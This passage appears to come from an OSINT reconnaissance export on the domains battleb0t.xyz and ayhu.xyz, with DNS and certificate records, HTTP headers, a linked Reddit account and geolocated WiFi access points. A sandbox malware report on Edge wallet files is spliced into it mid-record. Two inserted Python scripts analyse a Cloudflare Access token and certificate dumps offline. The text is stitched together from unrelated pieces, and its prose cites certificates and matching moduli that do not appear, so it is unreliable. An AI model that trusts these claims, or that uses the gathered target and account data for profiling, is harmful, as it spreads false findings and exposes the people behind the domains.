u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"zeptojs.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.edgeoffer.microsoft.com"\n "api.github.com"\n "ghbtns.com"\n "zeptojs.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ""paypal.com"," (Indicator: "dir "; File: "wallet-checkout-eligible-sites-pre-stable.json")\n Found string ""baysidebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found 
string ""comeherebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""www.facebook.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""linkedin.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string "<figure class="highlight"><pre><code class="language-js" data-lang="js"><span class="c1">// autolink everything that looks like a Twitter username</span>" (Indicator: "dir "; File: "urlref_httpzeptojs.com")\n Found string "<span class="s1">\'$1@<a href="http://twitter.com/$2">$2</a>\'</span><span class="p">)</span>" (Indicator: "dir "; File: "urlref_httpzeptojs.com")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""highkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""mandalascrubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""primalharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""amazingclubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""purehockey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""order.firehousesubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""cousinssubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""digikey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""hockeymonkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n 
""4amscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""6whiskey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""99centsubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""allieandmickey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""alteregoscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""annabelbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""aspirefashionscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""augustbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""bananasmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""baseballmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlref_httpzeptojs.com" has type "HTML document UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4044_143422276\\shopping.js]- [targetUID: 00000000-00004044]\n "data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00004072]\n "wallet-stable.json" has type "ASCII text"- [targetUID: N/A]\n "wallet.bundle.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%TEMP%\\4044_1336506228\\edge_driver.js]- [targetUID: 00000000-00004044]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with 
CRLF line terminators"- Location: [%TEMP%\\4044_143422276\\edge_driver.js]- [targetUID: 00000000-00004044]\n "vendor.bundle.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_1]- [targetUID: 00000000-00004072]\n "wallet-drawer.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\4044_1336506228\\Wallet-Checkout\\wallet-drawer.bundle.js]- [targetUID: 00000000-00004044]\n "auto_open_controller.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4044_143422276\\auto_open_controller.js]- [targetUID: 00000000-00004044]\n "000009.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000009.log]- [targetUID: 00000000-00004044]\n "000013.ldb" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000013.ldb]- [targetUID: 00000000-00004044]\n "bnpl.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\4044_1336506228\\bnpl\\bnpl.bundle.js]- [targetUID: 00000000-00004044]\n "tokenized-card.bundle.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "edge_checkout_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4044_143422276\\edge_checkout_page_validator.js]- [targetUID: 00000000-00004044]\n "edge_confirmation_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4044_143422276\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00004044]\n "product_page.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4044_143422276\\product_page.js]- [targetUID: 00000000-00004044]\n "miniwallet.bundle.js" has type "ASCII text with 
very long lines"- [targetUID: N/A]\n "notification.bundle.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Asset Store\\assets.db\\000003.log]- [targetUID: 00000000-00004044]\n "load_statistics.db" has type "SQLite 3.x database | 185.199.110.153 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Reddit (Category: social)
https://www.reddit.com/user/ayhu | ayhu |
| 2023-05-12 02:54:22 | Linked URL - External | No | Web Spider | 0 | 0 | 4 | 0 | None | https://qolhub.cloudflareaccess.com/cdn-cgi/access/verify-code/panel.battleb0t.xyz?kid=0e8fcd5c4d6f2fbb6bc18c164812f146f66e83d772c26262aaca860dfa7cb5c3&redirect_url=/&meta=eyJraWQiOiJlOTUxOWI4ZTZkZDg2N2Q4MGQwZTRiZWVhYjI5MjZlYjM3ZWJmYThhMWIxZjlmYmMwN2ExNjVkMGQ5YmEyZjFmIiwiYWxnIjoiUlMyNTYiLCJ0eXAiOiJKV1QifQ.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.nmLVBPo6h3yJ-eeLa1z8MJxup5DvHiZsxc_azrIBMDZkAuzXJXrBgg2dSJete3yFlMRnhoJH_s6r9en_PegF2VXgTcEejRV68gqMq3vN0gqcnLCjxJ7R_q2HnXYBEj1GnW4CnMF2ytqVCjGW9kOAsQf3EnRyTjMGNkhzWHc8cSXk-YZsczAFnsTwlEWEWf-Vtivai9PAOaJofIoE_LacgC5tzGLXINkdWAyouIP8rapadqait8eo8oF0pNIeRyyLHJRBoo5cXuRrs7jtBVREnw74sp6OKnYrw3iVG9BLCEN00TCsKQ0TApXWvZYkQfxCCgFAewQtUM8EIB0Sx1pQUg | https://qolhub.cloudflareaccess.com/cdn-cgi/access/login/panel.battleb0t.xyz?kid=0e8fcd5c4d6f2fbb6bc18c164812f146f66e83d772c26262aaca860dfa7cb5c3&redirect_url=%2F&meta=eyJraWQiOiJlOTUxOWI4ZTZkZDg2N2Q4MGQwZTRiZWVhYjI5MjZlYjM3ZWJmYThhMWIxZjlmYmMwN2ExNjVkMGQ5YmEyZjFmIiwiYWxnIjoiUlMyNTYiLCJ0eXAiOiJKV1QifQ.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.nmLVBPo6h3yJ-eeLa1z8MJxup5DvHiZsxc_azrIBMDZkAuzXJXrBgg2dSJete3yFlMRnhoJH_s6r9en_PegF2VXgTcEejRV68gqMq3vN0gqcnLCjxJ7R_q2HnXYBEj1GnW4CnMF2ytqVCjGW9kOAsQf3EnRyTjMGNkhzWHc8cSXk-YZsczAFnsTwlEWEWf-Vtivai9PAOaJofIoE_LacgC5tzGLXINkdWAyouIP8rapadqait8eo8oF0pNIeRyyLHJRBoo5cXuRrs7jtBVREnw74sp6OKnYrw3iVG9BLCEN00TCsKQ0TApXWvZYkQfxCCgFAewQtUM8EIB0Sx1pQUg |
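The Web Spider row above captured a Cloudflare Access login and verify-code URL for panel.battleb0t.xyz. Its `meta` parameter is a compact JWS whose payload segment is elided on the page, so only the header and the signature survive. The script below is an added example, not part of the SpiderFoot export and not Cloudflare's code, that extracts what such a URL reveals without touching the server: the Access team subdomain, the protected hostname, the JWT header (algorithm and key id) and the signature size, and it refuses any algorithm other than RS256, as an origin validating Access tokens should rather than falling back to whatever the header names. The URL constant is the page's verify-code URL with the elided payload left as an empty segment ("header..signature"); that emptiness is this example's stand-in for the gap, not data from the page.

```python
"""Offline triage of a Cloudflare Access login URL: which team gateway and
protected host it belongs to, and what the JWT in `meta` says about itself."""
import base64
import json
from urllib.parse import parse_qs, urlsplit

# The verify-code URL from the row above. The JWT's payload segment is elided
# on the page, so it is left empty here (".."); only the header and signature
# segments are real. Constructed from the page, never fetched.
CAPTURED_URL = (
    "https://qolhub.cloudflareaccess.com/cdn-cgi/access/verify-code/"
    "panel.battleb0t.xyz"
    "?kid=0e8fcd5c4d6f2fbb6bc18c164812f146f66e83d772c26262aaca860dfa7cb5c3"
    "&redirect_url=/"
    "&meta=eyJraWQiOiJlOTUxOWI4ZTZkZDg2N2Q4MGQwZTRiZWVhYjI5MjZlYjM3ZWJmYThhMWIxZjlmYmMwN2ExNjVkMGQ5YmEyZjFmIiwiYWxnIjoiUlMyNTYiLCJ0eXAiOiJKV1QifQ"
    "..nmLVBPo6h3yJ-eeLa1z8MJxup5DvHiZsxc_azrIBMDZkAuzXJXrBgg2dSJete3yFlMRnhoJH_s6r9en_PegF2VXgTcEejRV68gqMq3vN0gqcnLCjxJ7R_q2HnXYBEj1GnW4CnMF2ytqVCjGW9kOAsQf3EnRyTjMGNkhzWHc8cSXk-YZsczAFnsTwlEWEWf-Vtivai9PAOaJofIoE_LacgC5tzGLXINkdWAyouIP8rapadqait8eo8oF0pNIeRyyLHJRBoo5cXuRrs7jtBVREnw74sp6OKnYrw3iVG9BLCEN00TCsKQ0TApXWvZYkQfxCCgFAewQtUM8EIB0Sx1pQUg"
)

# Cloudflare Access signs its tokens with RSA. Anything else in the header is a
# reason to stop, never a reason to "try the other algorithm".
ALLOWED_ALGS = {"RS256"}


def b64url_decode(segment):
    """JWS base64url carries no padding; restore it. Empty segment -> None."""
    if not segment:
        return None
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def split_jws(token):
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWS: expected 3 segments, got %d" % len(parts))
    return parts


def describe_access_url(url):
    """Return the facts an analyst can read off an Access URL without a request."""
    u = urlsplit(url)
    if not u.hostname or not u.hostname.endswith(".cloudflareaccess.com"):
        raise ValueError("not a Cloudflare Access gateway URL")
    team = u.hostname.split(".")[0]
    path = u.path.strip("/").split("/")  # cdn-cgi/access/<action>/<protected host>
    if path[:2] != ["cdn-cgi", "access"] or len(path) < 4:
        raise ValueError("unexpected Access path: %s" % u.path)
    qs = parse_qs(u.query)
    hdr_seg, payload_seg, sig_seg = split_jws(qs["meta"][0])
    header = json.loads(b64url_decode(hdr_seg))
    if header.get("alg") not in ALLOWED_ALGS:
        raise ValueError("refusing token with alg=%r" % header.get("alg"))
    payload_bytes = b64url_decode(payload_seg)  # None when the segment is elided
    return {
        "team": team,
        "action": path[2],
        "protected_host": path[3],
        "redirect_url": qs.get("redirect_url", [None])[0],
        "query_kid": qs.get("kid", [None])[0],
        "jwt_alg": header["alg"],
        "jwt_typ": header.get("typ"),
        "jwt_kid": header.get("kid"),
        "payload": json.loads(payload_bytes) if payload_bytes else None,
        "signature_bytes": len(b64url_decode(sig_seg)),
    }


if __name__ == "__main__":
    for key, value in describe_access_url(CAPTURED_URL).items():
        print("%-16s %s" % (key, value))
```

The header's `kid` and the `kid` in the query string are different identifiers; report both rather than assuming either one names the signing key. A 256-byte signature is what RS256 over a 2048-bit key produces, which is consistent with the header. With the payload elided there are no claims to read, and nothing here verifies or reproduces the signature.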
| 2023-05-12 02:54:00 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c55c7e88fa82340-ORD
Content-Encoding: gzip
| 104.21.6.166 |
| 2023-05-12 02:54:10 | Netblock IPv6 Membership | No | Censys | 0 | 0 | 2 | 0 | None | 2606:4700:3031::/48 | 2606:4700:3031::6815:6a6 |
| 2023-05-12 03:01:37 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.136): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:09:38 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 106.48.229.35.bc.googleusercontent.com | 35.229.48.106 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Balcioglu (Net ID: 00:1A:2A:63:1A:23) | 40.2024, 29.0398 |
| 2023-05-12 02:47:32 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None | 172.67.135.9:8443 | 172.67.135.9 |
| 2023-05-12 02:44:15 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 1 | 2 | 0 | None | netlify.app | funny.battleb0t.xyz |
| 2023-05-12 03:09:10 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 46.101.229.68 | 46.101.229.70 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | AMX (Net ID: 00:02:E3:40:F7:BD) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:54:03 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["7c5a3af72b618723-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 172.67.135.9 |
| 2023-05-12 03:34:24 | Affiliate - IP Address | No | DNS Look-aside | 0 | 0 | 3 | 0 | None | 45.131.109.50 | 45.131.109.53 |
| 2023-05-12 03:01:27 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.8): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:44:11 | Co-Hosted Site | No | SSL Certificate Analyzer | 4 | 1 | 1 | 0 | None | github.com | battleb0t.xyz |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | SpeedStream (Net ID: 00:01:24:F0:82:16) | 37.7813933,-122.3918002 |
| 2023-05-12 03:03:43 | Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | www.ayhu.xyz | [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://www.ayhu.xyz', u'http_status': 301, u'plugins': {u'Country': {u'string': [u'UNITED STATES'], u'module': [u'US']}, u'HTTPServer': {u'string': [u'cloudflare']}, u'RedirectLocation': {u'string': [u'https://www.ayhu.xyz/']}, u'UncommonHeaders': {u'string': [u'report-to,nel,cf-ray,alt-svc']}, u'IP': {u'string': [u'104.21.6.166']}}}, {}] |
| 2023-05-12 02:45:17 | SSL Certificate - Raw Data | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:9d:c5:27:de:ee:41:17:4e:89:34:e6:9d:87:79:d7:50:31
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 27 01:19:20 2022 GMT
Not After : Mar 27 01:19:19 2023 GMT
Subject: CN=battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ab:c7:1b:0c:ed:c6:01:f8:ea:a9:b3:cf:08:17:
4f:a2:cb:7c:34:c4:66:12:e6:ef:f3:98:17:79:c9:
65:ee:66:4c:1f:9a:92:7d:33:ee:07:fa:2e:15:62:
f7:b4:f3:1f:d5:4f:2e:b1:67:a8:49:42:bf:e3:cc:
9a:b7:30:46:c2:68:f5:28:a9:64:69:6f:4c:4b:64:
24:c9:dc:ed:46:9f:a4:1f:c2:ef:6f:36:d0:bc:69:
27:b8:e2:d6:18:70:40:2c:b4:f5:ee:8f:f7:0d:8c:
6e:03:92:e7:5d:d6:3e:bc:bb:c9:5b:28:10:a0:5a:
f6:37:f5:e1:9e:15:23:72:6e:8e:69:01:09:a4:8c:
a4:c9:d7:db:05:01:90:48:4b:90:20:8c:38:7a:0a:
60:74:79:18:26:30:8e:60:0b:17:b9:24:a0:80:df:
3f:14:00:d3:09:e7:34:47:35:63:7c:54:d2:a0:9d:
e1:57:d1:cb:13:d3:3c:30:24:97:8e:ea:34:00:9f:
cc:6c:0c:6a:f7:54:bc:5e:60:dc:46:31:c2:09:de:
d9:c3:e3:63:1e:8f:1c:c5:90:90:e8:da:86:be:7d:
f1:c3:1f:1a:86:69:9b:0b:e0:b2:0c:47:08:c8:92:
59:2b:66:2f:fa:a1:38:a1:2f:10:65:f6:97:fd:16:
87:33
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
63:4E:15:85:56:5A:A4:94:02:C2:16:42:A4:A5:97:9A:38:02:57:97
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Dec 27 02:19:21.033 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:84:8B:29:D3:64:84:A1:88:50:9E:D3:
9D:A2:EF:43:30:D4:86:D3:E7:90:33:F8:14:58:7B:CF:
3D:0B:35:99:AF:02:21:00:F5:19:F9:97:83:47:D5:29:
CD:26:D1:57:6A:23:AA:62:7D:CE:2C:FB:A1:20:B8:FD:
9C:0C:85:75:32:C7:61:39
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Dec 27 02:19:21.513 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:2A:8C:77:97:5A:9C:CA:1E:7D:0B:BB:90:
03:7D:66:BB:14:11:F7:DD:60:15:1B:74:54:65:58:17:
74:A3:82:F5:02:20:39:E0:01:B6:95:4D:B6:CD:8E:C1:
7B:5C:40:66:7A:40:6C:AF:84:AE:EB:32:D3:B7:97:42:
AD:31:F6:EA:DE:DF
Signature Algorithm: sha256WithRSAEncryption
28:6a:7b:fe:38:78:7b:21:c1:3b:3c:3f:d1:b4:61:2f:4e:f1:
da:92:46:31:44:1e:96:07:8b:dc:eb:28:ff:3b:d6:1e:71:c7:
04:81:de:c1:70:36:5f:a2:02:f0:0b:40:36:a9:26:40:5d:c9:
c5:74:71:85:41:ef:c7:6e:ec:6a:1e:90:c8:99:9e:b1:d7:35:
41:13:e3:8a:bb:a5:ed:b5:98:88:d3:24:fa:09:85:ca:86:91:
19:75:26:77:c5:e4:a7:a0:79:97:6e:2c:61:98:30:e5:11:ef:
4f:4f:76:31:95:ae:e6:0d:81:77:d6:68:98:ce:73:96:15:48:
9d:14:5f:98:61:fa:ea:76:c3:0c:1b:37:61:99:3c:2f:f6:e9:
73:46:98:a8:d6:36:63:fb:2a:24:e5:21:23:a5:d5:ad:34:e6:
c6:77:ad:af:49:43:09:52:9e:99:db:64:76:6f:f4:5e:ef:74:
7d:dc:e5:8a:5b:9f:ad:b1:5b:08:f3:ee:23:71:80:2c:ba:37:
2a:d1:cd:84:da:80:7c:ee:4b:32:65:01:30:f2:ea:6d:dc:e7:
31:d4:da:65:2d:de:fc:fd:7f:14:3a:b7:19:62:cd:de:44:e0:
8f:e2:7f:df:7c:67:e1:b0:69:e7:56:94:c1:5b:8c:c0:84:4a:
a0:80:54:7f
| battleb0t.xyz |
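The three Let's Encrypt dumps in the rows above (one for kekw.battleb0t.xyz, two for battleb0t.xyz) are in `openssl x509 -text` form. The script below is an added example, not part of the SpiderFoot export, that parses that form and runs the checks an analyst reading these rows would want: whether each certificate was valid on the scan date (the rows' "Date Found", 2023-05-12, taken as UTC, which is an assumption since the export names no zone), whether it covers a given hostname, and whether a renewal reused the previous key. The sample input is the three certificates cut down to the fields the script reads, with the modulus blocks dropped; on the page itself the two battleb0t.xyz certificates carry the same Subject Key Identifier and byte-identical moduli, which is exactly what the key-reuse check surfaces.

```python
"""Parse the `openssl x509 -text` dumps in the rows above and run the checks an
analyst wants from them: validity on the scan date, SAN coverage, key reuse."""
import re
from datetime import datetime, timezone

# Constructed sample: the three Let's Encrypt certificates from the rows above,
# cut down to the fields this script reads. Modulus blocks are omitted, so key
# reuse is judged by the Subject Key Identifier (the page's two battleb0t.xyz
# certificates also carry byte-identical moduli).
SAMPLE = """\
Certificate:
Serial Number:
03:23:36:1a:72:6e:fc:71:09:49:b1:35:f9:b5:e5:28:80:de
Not Before: Mar 13 12:52:05 2023 GMT
Not After : Jun 11 12:52:04 2023 GMT
Subject: CN=kekw.battleb0t.xyz
X509v3 Subject Key Identifier:
E6:0D:FB:5E:53:09:44:30:22:92:3D:83:C3:34:06:A0:52:1B:50:06
X509v3 Subject Alternative Name:
DNS:kekw.battleb0t.xyz
Certificate:
Serial Number:
04:b6:39:33:af:de:1e:32:f3:fc:2e:76:dc:bc:08:51:86:10
Not Before: Feb 25 01:39:25 2023 GMT
Not After : May 26 01:39:24 2023 GMT
Subject: CN=battleb0t.xyz
X509v3 Subject Key Identifier:
63:4E:15:85:56:5A:A4:94:02:C2:16:42:A4:A5:97:9A:38:02:57:97
X509v3 Subject Alternative Name:
DNS:battleb0t.xyz, DNS:www.battleb0t.xyz
Certificate:
Serial Number:
03:9d:c5:27:de:ee:41:17:4e:89:34:e6:9d:87:79:d7:50:31
Not Before: Dec 27 01:19:20 2022 GMT
Not After : Mar 27 01:19:19 2023 GMT
Subject: CN=battleb0t.xyz
X509v3 Subject Key Identifier:
63:4E:15:85:56:5A:A4:94:02:C2:16:42:A4:A5:97:9A:38:02:57:97
X509v3 Subject Alternative Name:
DNS:battleb0t.xyz
"""
# "Date Found" of the rows, taken as UTC (assumption: the export names no zone).
SCAN_TIME = datetime(2023, 5, 12, 2, 44, tzinfo=timezone.utc)


def _next_line(block, label):
    """Value on the line after `label:`, which is where these dumps put it."""
    m = re.search(re.escape(label) + r":?[ \t]*\n[ \t]*(\S.*)", block)
    return m.group(1).strip() if m else None


def _utc(s):
    s = " ".join(s.split())  # openssl pads single-digit days with two spaces
    return datetime.strptime(s, "%b %d %H:%M:%S %Y GMT").replace(tzinfo=timezone.utc)


def parse_openssl_text(text):
    """Split concatenated `openssl x509 -text` dumps into dicts."""
    certs = []
    for block in re.split(r"^Certificate:[ \t]*$", text, flags=re.M)[1:]:
        san = _next_line(block, "X509v3 Subject Alternative Name") or ""
        certs.append({
            "serial": _next_line(block, "Serial Number").lower(),
            "subject": re.search(r"Subject:\s*(.+)", block).group(1).strip(),
            "not_before": _utc(re.search(r"Not Before:\s*(.+)", block).group(1)),
            "not_after": _utc(re.search(r"Not After\s*:\s*(.+)", block).group(1)),
            "sans": [n.strip()[4:] for n in san.split(",") if n.strip().startswith("DNS:")],
            "ski": _next_line(block, "X509v3 Subject Key Identifier").upper(),
        })
    return certs


def valid_at(cert, when=SCAN_TIME):
    return cert["not_before"] <= when <= cert["not_after"]


def days_left(cert, when=SCAN_TIME):
    return (cert["not_after"] - when).days  # negative once expired


def covers(cert, hostname):
    """SAN match: exact name, or a wildcard in the leftmost label only."""
    host = hostname.lower()
    for san in (s.lower() for s in cert["sans"]):
        if san == host:
            return True
        if san.startswith("*.") and host.endswith(san[1:]) and host.count(".") == san.count("."):
            return True
    return False


def key_reuse(certs):
    """SKI -> serials issued for that key; more than one means a renewal kept it."""
    by_key = {}
    for c in certs:
        by_key.setdefault(c["ski"], []).append(c["serial"])
    return {k: v for k, v in by_key.items() if len(v) > 1}


if __name__ == "__main__":
    certs = parse_openssl_text(SAMPLE)
    for c in certs:
        print(c["subject"], valid_at(c), days_left(c), covers(c, "www.battleb0t.xyz"))
    print("key reused across renewals:", key_reuse(certs))
```

Key reuse across renewals is not a defect in itself, but it means a key compromised while the December certificate was current stays usable under the February one, and revocation for key compromise has to cover every serial the check lists. The Subject Key Identifier is whatever the CA chose to put there; for issuers other than Let's Encrypt, compare the modulus (present in full on the page) rather than the SKI.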
| 2023-05-12 03:24:48 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | United States | Rosemont, Illinois, 60018, United States, North America |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:57:9F:CA) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ATTDGsRAys (Net ID: 88:96:4E:86:44:00) | 37.751, -97.822 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | cross-origin-resource-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": 